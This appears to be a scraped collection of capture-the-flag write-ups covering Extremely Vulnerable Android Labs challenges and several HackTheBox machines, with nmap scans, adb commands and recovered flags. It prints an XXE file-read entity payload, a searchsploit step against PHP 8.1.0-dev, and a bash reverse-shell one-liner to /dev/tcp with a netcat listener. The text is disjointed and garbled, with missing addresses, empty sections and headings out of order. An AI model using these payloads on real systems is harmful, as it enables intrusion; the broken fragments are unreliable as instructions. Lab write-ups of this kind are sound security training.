EVABS Challenge 6

$ adb shell
vbox86p:/data/data/com.revo.evabs/databases # ls
$ adb pull /data/data/com.revo.evabs/databases/MAINFRAME_ACCESS .
$ ls
$ file MAINFRAME_ACCESS
EVABS{sqlite_is_not_safe}

EVABS Challenge 5

$ adb shell
vbox86p:/data/data/com.revo.evabs # ls
vbox86p:/data/data/com.revo.evabs # cd shared_prefs
vbox86p:/data/data/com.revo.evabs/shared_prefs # ls
vbox86p:/data/data/com.revo.evabs/shared_prefs # cat DETAILS.xml
EVABS{shar3d_pr3fs_c0uld_be_c0mpromiz3ds}

EVABS Challenge 4


HTB BountyHunter

$ nmap -A -T4 -v

Open ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

As we can observe in Burp, the data is URL+base64 encoded. It’s XML data, so we could try an XXE.

Using Cyberchef ( on we also find :

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file_to_use"> ]>

We can use to check other files

EVABS Challenge 3

HTB Love

$ nmap -A -p- -T4

Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
ssl-cert: Subject:
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd

EVABS Challenge 2


HTB Knife

$ nmap
$ nmap -p- -v
$ whatweb
$ searchsploit php 8.1.0-dev
$ searchsploit -m php/webapps/
$ python3
$ id

Using this exploit we get a reverse shell, but it is not very useful; we can try to get a better one.

$ python3 -u -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'"
$ sudo nc -lvnp 4444
james@knife:/$ ls
james@knife:/$ cd /home
james@knife:/home$ ls
james@knife:/home$

EVABS (Extremely Vulnerable Android Labs) Challenge 1

According to An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners. The effort is to introduce beginners with very limited or zero knowledge to some of the major and commonly found real-world based Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach and in each level, the player learns a new


$ nmap -A -p- -T4 -Pn

Open ports:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn

Dashboard Security Snapshot IP Config Network status Security Snapshot

Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if